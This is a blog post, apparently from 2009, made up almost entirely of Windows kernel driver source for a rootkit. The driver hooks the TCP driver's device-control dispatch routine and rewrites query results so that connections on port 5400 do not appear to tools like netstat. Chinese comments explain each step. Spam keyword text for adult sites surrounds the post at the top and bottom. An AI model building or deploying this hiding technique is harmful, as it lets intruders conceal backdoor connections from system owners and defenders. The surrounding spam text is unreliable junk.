青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

隨筆-23  評論-73  文章-3  trackbacks-0

/************************************************************
 驅動層隱藏端口示例:

 說明:通過HookTCP驅動程序的Irp分派例程(irpStack->MajorFunction[IRP_MJ_DEVICE_CONTROL])
          來隱藏應用層查詢端口信息
************************************************************/
#include <ntddk.h>

#define CO_TL_ENTITY 0x400
#define CL_TL_ENTITY 0x401
#define IOCTL_TCP_QUERY_INFORMATION_EX 0x00120003
#define HTONS(a) (((0xFF&a)<<8) + ((0xFF00&a)>>8))

typedef struct TDIEntityID
{
 ULONG tei_entity;
 ULONG tei_instance;
}TDIEntityID;

typedef struct TDIObjectID
{
 TDIEntityID toi_entity;
 ULONG toi_class;
 ULONG toi_type;
 ULONG toi_id;
}TDIObjectID;

typedef struct _CONNINFO101

 unsigned long status;
 unsigned long src_addr;
 unsigned short src_port;
 unsigned short unk1;
 unsigned long dst_addr;
 unsigned short dest_port;
 unsigned short unk2;
}CONNINFO101,*PCONNINFO101;

typedef struct _CONNINFO102
{
 unsigned long status;
 unsigned long src_addr;
 unsigned short src_port;
 unsigned short unk1;
 unsigned long dst_addr;
 unsigned short dst_port;
 unsigned short unk2;
 unsigned long pid;
}CONNINFO102,*PCONNINFO102;

typedef struct _CONNINFO110
{
 unsigned long size;
 unsigned long status;
 unsigned long src_addr;
 unsigned short src_port;
 unsigned short unk1;
 unsigned long dst_addr;
 unsigned short dst_port;
 unsigned short unk2;
 unsigned long pid;
 PVOID unk3[35];
}CONNINFO110,*PCONNINFO110;

typedef struct _REQINFO
{
 PIO_COMPLETION_ROUTINE OldCompletion;
 unsigned long ReqType;
}REQINFO,*PREQINFO;

PFILE_OBJECT pFile_tcp;
PDEVICE_OBJECT pDev_tcp;
PDRIVER_OBJECT pDrv_tcpip;

typedef NTSTATUS (*OLDIRPMJDEVICECONTROL)(IN PDEVICE_OBJECT,IN PIRP);
OLDIRPMJDEVICECONTROL OldIrpMjDeviceControl;

NTSTATUS IoCompletionRoutine( IN PDEVICE_OBJECT DeviceObject,
         IN PIRP Irp,
         IN PVOID Context )
/*
* 如果將端口的狀態信息改為0,則端口就不顯示
* 各個端口狀態信息如下:
*  1 = CLOSED
*  2 = LISTENING
*  3 = SYN_SENT
*  4 = SYN_RECEIVED
*  5 = ESTABLISHED
*  6 = FIN_WAIT_1
*  7 = FIN_WAIT_2
*  8 = CLOSE_WAIT
*  9 = CLOSING
*  ......
*/
{
 PVOID OutputBuffer;
 ULONG NumOutputBuffers;
 PIO_COMPLETION_ROUTINE p_compRoutine;
 ULONG i;
 
 OutputBuffer = Irp->UserBuffer;
 //將以前的Irp中的完成函數的指針恢復
 p_compRoutine = ((PREQINFO)Context)->OldCompletion;
 //以下為判斷各種網絡請求的參數類型
 if(((PREQINFO)Context)->ReqType == 0x101)
 {
  NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO101);
  for( i = 0;i < NumOutputBuffers;i ++ )
  {
   //在這里隱藏端口
   if(HTONS(((PCONNINFO101)OutputBuffer)[i].src_port) == 5400 )
   {
    ((PCONNINFO101)OutputBuffer)[i].status = 0;
   }
  }
 }
 else if(((PREQINFO)Context)->ReqType == 0x102)
 {
  NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO102);
  for( i = 0;i < NumOutputBuffers;i ++ )
  {
   if(HTONS(((PCONNINFO102)OutputBuffer)[i].src_port) == 5400 )
   {
    ((PCONNINFO102)OutputBuffer)[i].status = 0;
   }
  }
 }
 else if(((PREQINFO)Context)->ReqType == 0x110)
 {
  NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO110);
  for( i = 0;i < NumOutputBuffers;i ++ )
  {
   if(HTONS(((PCONNINFO110)OutputBuffer)[i].src_port) == 5400 )
   {
    ((PCONNINFO110)OutputBuffer)[i].status = 0;
   }
  }
 }
 //釋放在Hook中分配的內存
 ExFreePool(Context);
 
 if( (Irp->StackCount > (ULONG)1) && (p_compRoutine != NULL) )
 {
  //如果以前的IRP中有完成例程,就調用以前的完成例程
  return (p_compRoutine)(DeviceObject,Irp,NULL);
 }
 else
 {
  //如果以前的Irp沒有完成例程,就返回本Hook的狀態
  return Irp->IoStatus.Status;
 }
}

NTSTATUS HookedDeviceControl(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp)
{
 PIO_STACK_LOCATION irpStack;
 ULONG ioTransferType;
 TDIObjectID *inputBuffer;
 ULONG context;
 
 irpStack = IoGetCurrentIrpStackLocation(Irp);
 //判斷當前IRP棧單元的IRP_MJ_*例程
 switch( irpStack->MajorFunction )
 {
  case IRP_MJ_DEVICE_CONTROL:
  //如果IRP的次功能號為0且IOCTL查詢代碼為IOCTL_TCP_QUERY_INFORMATION_EX,
  //說明是應用層程序通過netstat.exe之類的程序請求查詢TCP端口號信息
  if((irpStack->MinorFunction == 0) && (irpStack->Parameters.DeviceIoControl.IoControlCode == IOCTL_TCP_QUERY_INFORMATION_EX))
  {
   //得到IoControlCode中的請求類型,判斷是否為METHOD_NEITHER方式的Irp
   //ioTransferType &= 3;是得到CTL_CODE中Irp的請求方式(METHOD_BUFFERED,METHOD_IN_DIRECT or METHOD_OUT_DIRECT,MOTHOD_NEITHER)
   ioTransferType = irpStack->Parameters.DeviceIoControl.IoControlCode;
   ioTransferType &= 3;
   if( ioTransferType == METHOD_NEITHER )
   {
    //MOTHOD_NEITHER方式的Irp的輸入緩沖區在Type3InputBuffer中
    inputBuffer = (TDIObjectID *)irpStack->Parameters.DeviceIoControl.Type3InputBuffer;
    //如果TDIObjectID的請求方式為CO_TL_ENTITY類型,說明是請求查詢TCP端口信息
    if( inputBuffer->toi_entity.tei_entity == CO_TL_ENTITY )
    {
     //0x101,0x102,0x110為應用層程序查詢時所帶的不同參數
     if( (inputBuffer->toi_id == 0x101) || (inputBuffer->toi_id == 0x102) || (inputBuffer->toi_id == 0x110) )
     {
      //改變Irp棧單元的控制位標志
      irpStack->Control = 0;
      irpStack->Control |= SL_INVOKE_ON_SUCCESS;
      //在Irp的棧單元中分配一個上下文,保存以前Irp的完成例程和應用層參數信息
      irpStack->Context = (PIO_COMPLETION_ROUTINE)ExAllocatePool(NonPagedPool,sizeof(REQINFO));
      //保存舊的完成例程
      ((PREQINFO)irpStack->Context)->OldCompletion = irpStack->CompletionRoutine;
      ((PREQINFO)irpStack->Context)->ReqType = inputBuffer->toi_id;
      //安裝新的完成例程
      //這步操作很重要,當鉤住當前的TCP驅動對象以后,就可以先一步得到發送驅動程序的Irp
      //在鉤子函數中處理完這個Irp后要把這個Irp發給真正的TCP驅動程序
      //在真正的TCP驅動程序處理完成這個Irp以后,我們的鉤子函數唯一可以再得到這個Irp的方式是
      //給這個Irp設置完成例程
      irpStack->CompletionRoutine = (PIO_COMPLETION_ROUTINE)IoCompletionRoutine;
     }
    }
   }
  }
  break;
  default:
  break;
 }
 //調用以前的DeviceIoControl函數
 return OldIrpMjDeviceControl(DeviceObject,Irp);
}

NTSTATUS InstallTCPDriverHook()
{
 NTSTATUS ntStatus;
 UNICODE_STRING deviceTCPUnicodeString;
 WCHAR deviceTCPNameBuffer[] = L"\\Device\\Tcp";
 
 pFile_tcp = NULL;
 pDev_tcp = NULL;
 pDrv_tcpip = NULL;
 
 RtlInitUnicodeString(&deviceTCPUnicodeString,deviceTCPNameBuffer);
 //得到TCP驅動程序的設備對象和文件對象
 ntStatus = IoGetDeviceObjectPointer(&deviceTCPUnicodeString,FILE_READ_DATA,&pFile_tcp,&pDev_tcp);
 if( !NT_SUCCESS(ntStatus) )
 {
  return ntStatus;
 }
 //得到TCP設備對象對應的驅動程序對象
 pDrv_tcpip = pDev_tcp->DriverObject;
 //保存以前TCP驅動對象中IRP_MJ_DEVICE_CONTROL函數的指針
 OldIrpMjDeviceControl = pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL];
 if( OldIrpMjDeviceControl )
 {
  //替換TCP驅動對象的IRP_MJ_DEVICE_CONTROL函數的指針為鉤子函數的指針
  InterlockedExchange((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL],(LONG)HookedDeviceControl);  
 }
 return STATUS_SUCCESS;
}

VOID Unload( IN PDRIVER_OBJECT  DriverObject )
{
 if( OldIrpMjDeviceControl )
 {
  //在這里恢復以前的函數入口地址
  pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL] = OldIrpMjDeviceControl;
 }
 DbgPrint("Rootkits Unload \n");
}

NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath)
{
 DbgPrint("Rootkits Load \n");
 DriverObject->DriverUnload = Unload;
 //安裝驅動程序的Irp分派函數鉤子
 return InstallTCPDriverHook();
}

posted on 2009-01-13 10:56 ViskerWong 閱讀(2467) 評論(0)  編輯 收藏 引用
青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            亚洲人线精品午夜| 亚洲欧美日本国产有色| 亚洲视频综合| 欧美亚洲一区二区在线| 国产女主播在线一区二区| 欧美一级理论片| 欧美成人高清| 亚洲欧美日本视频在线观看| 黄色成人小视频| 欧美久久影院| 欧美在线视频一区二区三区| 久久精品在线观看| 一本一本久久a久久精品综合麻豆| 欧美午夜寂寞影院| 久久免费精品日本久久中文字幕| 亚洲国内自拍| 亚洲欧美精品在线观看| 亚洲级视频在线观看免费1级| 欧美特黄一级| 欧美成年视频| 久久精彩视频| 亚洲欧美一区在线| 欧美日韩中文在线| 久久久国产亚洲精品| 亚洲精品看片| 久久一本综合频道| 亚洲欧美欧美一区二区三区| 亚洲国产一区二区a毛片| 国产美女一区二区| 欧美亚一区二区| 欧美理论大片| 美女爽到呻吟久久久久| 午夜视频久久久久久| 一区二区毛片| 亚洲精品视频啊美女在线直播| 麻豆成人小视频| 久久久精品免费视频| 亚洲视频电影图片偷拍一区| 亚洲精品九九| 亚洲国产精品一区制服丝袜| 国产亚洲aⅴaaaaaa毛片| 国产精品免费区二区三区观看| 欧美另类高清视频在线| 欧美日本国产精品| 欧美日韩精品在线播放| 欧美日韩国产小视频| 欧美激情2020午夜免费观看| 蜜桃av综合| 欧美成人一区在线| 欧美激情一区二区三区| 欧美成人午夜剧场免费观看| 久久精品一区二区三区不卡牛牛| 亚洲一区在线播放| 亚洲欧美色一区| 欧美一区二区三区在线观看视频| 午夜免费日韩视频| 久久精品天堂| 欧美sm重口味系列视频在线观看| 欧美福利视频一区| 欧美日韩在线免费观看| 国产精品女主播| 国产原创一区二区| 亚洲精品久久久久| 亚洲色图自拍| 久久女同互慰一区二区三区| 蘑菇福利视频一区播放| 亚洲黄色片网站| 一本色道婷婷久久欧美| 午夜精品理论片| 免费观看在线综合色| 欧美日韩一二三四五区| 国产欧美一区二区三区另类精品| 红桃视频成人| 正在播放亚洲一区| 久久婷婷国产综合精品青草 | 亚洲性夜色噜噜噜7777| 亚洲欧美日韩在线综合| 久久精品久久综合| 欧美日韩和欧美的一区二区| 国产精品毛片在线| 一区二区在线视频| 亚洲国产欧美久久| 亚洲免费观看在线视频| 久久国产精品免费一区| 亚洲人成小说网站色在线| 亚洲男人影院| 欧美日韩高清区| 一区在线播放视频| 午夜精品免费| 亚洲精品免费在线播放| 欧美综合国产| 欧美午夜不卡视频| 亚洲黄色性网站| 久久精品在线视频| 9色精品在线| 欧美激情a∨在线视频播放| 国产精品一级久久久| 亚洲精选91| 免费成人av| 久久激情五月婷婷| 国产欧美日韩亚洲| 亚洲一区图片| 日韩午夜av电影| 欧美高清视频一区二区| 激情亚洲一区二区三区四区| 亚洲欧美日韩在线综合| 最新国产精品拍自在线播放| 久久亚洲综合色| 狠狠综合久久av一区二区小说| 亚洲男人的天堂在线aⅴ视频| 亚洲黄色免费网站| 榴莲视频成人在线观看| 影音先锋另类| 久久人人爽爽爽人久久久| 羞羞色国产精品| 国产日韩在线视频| 久久精品在这里| 亚洲欧美在线视频观看| 国产精品一区二区久久| 亚洲综合色视频| 99re6这里只有精品| 欧美片在线播放| 一区二区三区欧美成人| 99视频在线精品国自产拍免费观看| 欧美高清在线视频| 99热这里只有成人精品国产| 亚洲国产精品视频一区| 欧美久久久久久久久| 99综合视频| 在线视频精品一区| 国产九九精品视频| 久久琪琪电影院| 另类天堂av| 欧美一级淫片播放口| 亚洲第一偷拍| 欧美成人激情视频| 99精品欧美一区| 亚洲每日更新| 国产乱肥老妇国产一区二| 性做久久久久久久免费看| 亚洲女人天堂av| 在线观看日韩av先锋影音电影院| 欧美顶级大胆免费视频| 欧美国产亚洲视频| 午夜精品国产精品大乳美女| 欧美在线免费观看视频| 亚洲电影免费在线| 亚洲人成精品久久久久| 国产精品美女久久久久av超清| 欧美亚洲在线| 久久亚洲精品一区| 中文日韩在线视频| 欧美在线观看视频一区二区| 亚洲日本精品国产第一区| 日韩视频二区| 国产一区二区三区奇米久涩| 欧美韩日精品| 国产精品一级二级三级| 欧美激情国产精品| 国产精品日韩精品| 欧美黄色影院| 国产人成精品一区二区三| 亚洲国产精品精华液2区45| 国产精品一二一区| 欧美第一黄色网| 国产日韩欧美综合一区| 亚洲承认在线| 国产毛片精品国产一区二区三区| 另类成人小视频在线| 国产精品欧美久久| 亚洲激情校园春色| 一区免费观看视频| 中文国产一区| 一本大道久久a久久综合婷婷| 久久国产精品电影| 午夜精品福利在线| 欧美日韩国产限制| 亚洲大片一区二区三区| 很黄很黄激情成人| 亚洲欧美激情在线视频| 日韩午夜在线播放| 欧美一区二区三区在线免费观看| 亚洲伦理一区| 久久久蜜臀国产一区二区| 午夜在线观看免费一区| 欧美电影免费观看大全| 欧美有码在线视频| 欧美日韩中文字幕精品| 亚洲人成毛片在线播放| 亚洲二区在线| 久久久久高清| 免费不卡在线观看av| 国内外成人在线| 性欧美1819sex性高清| 欧美一区二区福利在线| 国产精品啊v在线| 一本久道久久综合狠狠爱| 亚洲精品久久久一区二区三区| 久久米奇亚洲| 亚洲电影在线免费观看|